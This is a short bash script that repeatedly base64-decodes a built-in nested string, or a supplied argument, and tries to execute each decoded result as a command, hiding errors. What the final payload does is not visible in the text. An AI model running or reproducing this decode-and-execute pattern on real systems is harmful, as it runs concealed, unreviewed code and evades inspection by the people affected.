#!/bin/bash

if [[ -n $1 ]]
  then
     str=$1
  else
     str=Vm0wd2VHUXhUWGRPVldoVFYwZG9WMVl3WkRSV1ZsbDNXa1JTVjFadGVGbGFWV1JIVm1zeFdHVkliRmROYWtaSVdWWlZlRll4WkhWaFJscHBWa1ZhU1ZaclVrZFpWMUpIVm01V2FsSnRVbFJhVjNSWFRURmtXR1JIZEZOaVZscFpWbTEwWVdGV1NuUmhSemxWVm5wR2RsbHFSbXRXTVZaeVdrWldUbFpYZHpCV2EyTXhWVEZXUjFkdVRsUmlSMmhZV1ZkMFlWUkdXa2RYYlhSWVVqRktTRmRyWkhkVWJGcFZWbXRvVjFKc2NHaFpla1pyVTBaT2MySkdTbWxoTUhCWlYxZDRiMkl5UmtkalJXUllZbGhTY1ZsclduZE5SbXQzVmxSV1ZrMXJjRlpaV0hCSFZqSktTRlZZWkZwaGEzQklWV3BHVTJOc1pITlZiV3hvVFZoQ2RsWnNaREJXTWs1eVRWVmtWbGRIYUZSV2EyUTBWV3hhVjFWWVpGQlZWREE1
fi

result=$(base64 -d <<< $str)

$result 2>/dev/null || $0 $result
